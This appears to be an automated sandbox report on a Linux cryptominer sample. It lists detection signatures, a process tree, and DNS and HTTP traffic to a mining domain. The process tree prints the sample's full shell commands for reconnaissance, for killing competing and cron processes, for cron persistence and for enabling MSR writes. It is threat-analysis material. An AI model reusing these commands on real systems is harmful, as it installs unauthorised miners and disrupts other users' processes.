Resubmissions

07/06/2023, 15:38 UTC

230607-s3e1cach8w 7

07/06/2023, 15:35 UTC

230607-s1gq6acc63 7

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20221111-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20221111-en, kernel:4.15.0-161-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    07/06/2023, 15:35 UTC

General

  • Target

    1

  • Size

    2.3MB

  • MD5

    fb95fc8c3ed253dec1b08722f1bbf18e

  • SHA1

    d48d6dc76323efa8c0ae799d245a650b9d914c09

  • SHA256

    215293b8bdd0a57497d5cc62421e64bb29334e088578679cbf509d66c7b7dc7e

  • SHA512

    498f68c04f66a4cbcfed7e38f779183b2a7766948def1d159158c2799893ddcfb9a7dc2762c8958d6ae479a62f71edee460ac31a5939aa3c149efe59a987834e

  • SSDEEP

    49152:QM4HMaoo1fdQLCS1ytoWW7b/7GN2PM6jm:94Hp11aChtoB7b/7GYEZ

Malware Config

Signatures

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence

  • Checks CPU configuration 1 TTPs 3 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicates whether the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 7 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 59 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/1
    /tmp/1
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:611
    • /bin/sh
      sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      2⤵
      PID:612
      • /usr/bin/whoami
        whoami
        3⤵
        PID:623
      • /bin/hostname
        hostname
        3⤵
        PID:624
      • /bin/grep
        grep -c "^processor" /proc/cpuinfo
        3⤵
        • Checks CPU configuration
        PID:625
    • /bin/sh
      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      2⤵
      PID:641
      • /bin/ps
        ps -A "-ostat,ppid"
        3⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:642
      • /usr/bin/awk
        awk "/[zZ]/ && !a[\$2]++ {print \$2}"
        3⤵
        PID:643
      • /usr/bin/id
        id -u
        3⤵
        PID:649
      • /bin/ps
        ps x
        3⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:650
      • /bin/grep
        grep /etc/cron
        3⤵
        PID:651
      • /bin/grep
        grep -v grep
        3⤵
        PID:652
    • /bin/sh
      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      2⤵
      PID:654
      • /usr/bin/id
        id -u
        3⤵
        PID:655
      • /bin/ps
        ps aux
        3⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:656
      • /bin/grep
        grep -v grep
        3⤵
        PID:657
      • /bin/grep
        grep -v -- "-bash[[:space:]]*\$"
        3⤵
        PID:658
      • /bin/grep
        grep -v /usr/sbin/httpd
        3⤵
        PID:659
      • /usr/bin/awk
        awk "{if(\$3>30.0) print \$2}"
        3⤵
        PID:660
    • /bin/sh
      sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/1' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/1' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/1\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
      2⤵
      • Writes file to tmp directory
      PID:662
      • /bin/rm
        rm -rf /tmp/.cron
        3⤵
        PID:664
      • /usr/bin/crontab
        crontab -l
        3⤵
        PID:665
      • /bin/grep
        grep -v grep
        3⤵
        PID:666
      • /bin/grep
        grep -v /tmp/1
        3⤵
        PID:667
      • /usr/bin/crontab
        crontab /tmp/.cron
        3⤵
        • Creates/modifies Cron job
        PID:675
      • /bin/rm
        rm -rf /tmp/.cron
        3⤵
        PID:676
    • /bin/sh
      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
      2⤵
      PID:677
      • /usr/bin/id
        id -u
        3⤵
        PID:678
  • /bin/hostname
    hostname -I
    1⤵
    PID:615
  • /usr/bin/awk
    awk "{print \$1}"
    1⤵
    PID:617
  • /bin/cat
    cat /etc/ssh/sshd_config
    1⤵
    PID:619
  • /bin/grep
    grep "Port "
    1⤵
    PID:620
  • /usr/bin/head
    head -n 1
    1⤵
    PID:621
  • /usr/bin/awk
    awk "{print \"-\"\$2}"
    1⤵
    PID:622
  • /bin/grep
    grep -m 1 "model name" /proc/cpuinfo
    1⤵
    • Checks CPU configuration
    PID:628
  • /usr/bin/cut
    cut -d: -f2
    1⤵
    PID:629
  • /bin/sed
    sed -e "s/^ *//"
    1⤵
    • Reads runtime system information
    PID:630
  • /bin/sed
    sed -e "s/\$//"
    1⤵
    PID:631
  • /usr/bin/awk
    awk "{print \$1}"
    1⤵
    PID:634
  • /usr/bin/awk
    awk "{print \$4}"
    1⤵
    PID:637
  • /usr/bin/awk
    awk "{print \$4}"
    1⤵
    PID:640
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:669
  • /bin/grep
    grep -v grep
    1⤵
    PID:670
  • /bin/grep
    grep "/tmp/1\$"
    1⤵
    PID:671
  • /usr/bin/sort
    sort
    1⤵
    PID:672
  • /usr/bin/uniq
    uniq
    1⤵
    PID:673
  • /usr/bin/wc
    wc -l
    1⤵
    PID:674
  • /bin/ps
    ps aux
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:680
  • /bin/grep
    grep -v grep
    1⤵
    PID:681
  • /bin/grep
    grep -- "-bash[[:space:]]*\$"
    1⤵
    PID:682
  • /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    1⤵
    PID:683
  • /usr/bin/wc
    wc -l
    1⤵
    PID:684
  • /bin/sh
    sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
    1⤵
    PID:691
    • /sbin/modprobe
      /sbin/modprobe msr "allow_writes=on"
      2⤵
      • Enumerates kernel/hardware configuration
      PID:692

Network

  • US
    DNS
    xmr-rx0.pwndns.pw
    Remote address: 1.1.1.1:53
    Request: xmr-rx0.pwndns.pw IN A
    Response:
      xmr-rx0.pwndns.pw IN A 134.209.222.172
      xmr-rx0.pwndns.pw IN A 51.210.15.231
      xmr-rx0.pwndns.pw IN A 104.248.18.85
  • US
    DNS
    xmr-rx0.pwndns.pw
    Remote address: 1.1.1.1:53
    Request: xmr-rx0.pwndns.pw IN AAAA
    Response:
  • 104.248.18.85:80
    xmr-rx0.pwndns.pw
    http
    4.5kB
    4.9kB
    33
    21
  • 1.1.1.1:53
    xmr-rx0.pwndns.pw
    dns
    74 B
    122 B
    1
    1
    DNS Request: xmr-rx0.pwndns.pw
    DNS Response:
      134.209.222.172
      51.210.15.231
      104.248.18.85
  • 1.1.1.1:53
    xmr-rx0.pwndns.pw
    dns
    74 B
    137 B
    1
    1
    DNS Request: xmr-rx0.pwndns.pw

                                                                                        Downloads

  • /tmp/.cron
    Filesize
      22B
    MD5
      0c846569fad0c790b8a218e5ed420694
    SHA1
      ee8cfcde03a4fd38e1e6fbe7d0e3fd4c9aa18748
    SHA256
      2f03f23bb049d1ff68b15611e1ad1ee89c93a472a025fd748eb592dd31560cb4
    SHA512
      3b59ac36c4d688fe9bfc64d3a52db4c5e8b9443344be4d42d51717c92932a56117215ce3975fd2df60f4fcb9910c81f05bfc18a4762359d31fed089b090cc7bd
  • /var/spool/cron/crontabs/tmp.paFbJV
    Filesize
      206B
    MD5
      c36d9e4ea0b13afb4c9a633a7b447d24
    SHA1
      74e7773d4b15480f3ebb1bb738016d54ec3a277a
    SHA256
      66bf9da2326637a3feacd0bdecb2557a510029b29c82c57f3f0d08b3c3323de7
    SHA512
      d7e4a9dc000974287d1ee87ac5e663333816e8536b9d6f7dd6acd9859a88ff4562a67f1a292fa538938e897e755dd2dac41780c945a7730141de4fbfc409ab25
